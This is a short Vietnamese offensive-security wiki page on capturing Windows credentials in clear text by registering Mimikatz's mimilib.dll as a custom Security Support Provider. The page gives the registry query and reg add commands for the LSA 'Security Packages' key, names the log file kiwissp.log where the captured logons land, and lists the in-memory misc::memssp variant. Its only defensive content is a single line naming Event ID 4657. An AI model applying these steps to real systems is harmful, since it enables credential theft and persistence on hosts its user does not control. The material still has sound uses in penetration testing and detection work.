Custom SSP

Learn what is a SSP (Security Support Provider) here. Bạn có thể tạo SSP của riêng mình để ghi lại dưới dạng clear text các thông tin đăng nhập được sử dụng để truy cập vào máye.

Mimilib

mimilib.dll trong Mimikatz: Ghi vào tệp tất cả thông tin xác thực ở dạng rõ

Thả tệp dll vào C:\Windows\System32\

Nhận danh sác LSA Security Packages:

attacker@target

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
    Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

Thêm mimilib.dll vào Security Support Provider list (Security Packages):

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

Và sau khi khởi đông lại tất cả thông tin xác thực có thể tìm thấy ở dạng rõ trong C:\Windows\System32\kiwissp.log

In memory

Có thể inject trực tiếp vào bộ nhớ bằng Mimikatz (lệnh này có thể không ổn định/không hoạt động):

privilege::debug
misc::memssp

Biến mất sau khi reboot.

Mitigation

Event ID 4657 - Audit creation/change of HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

PreviousMimikatz NextLLMNR Poisoning, NTLM Replay

Last updated 10 months ago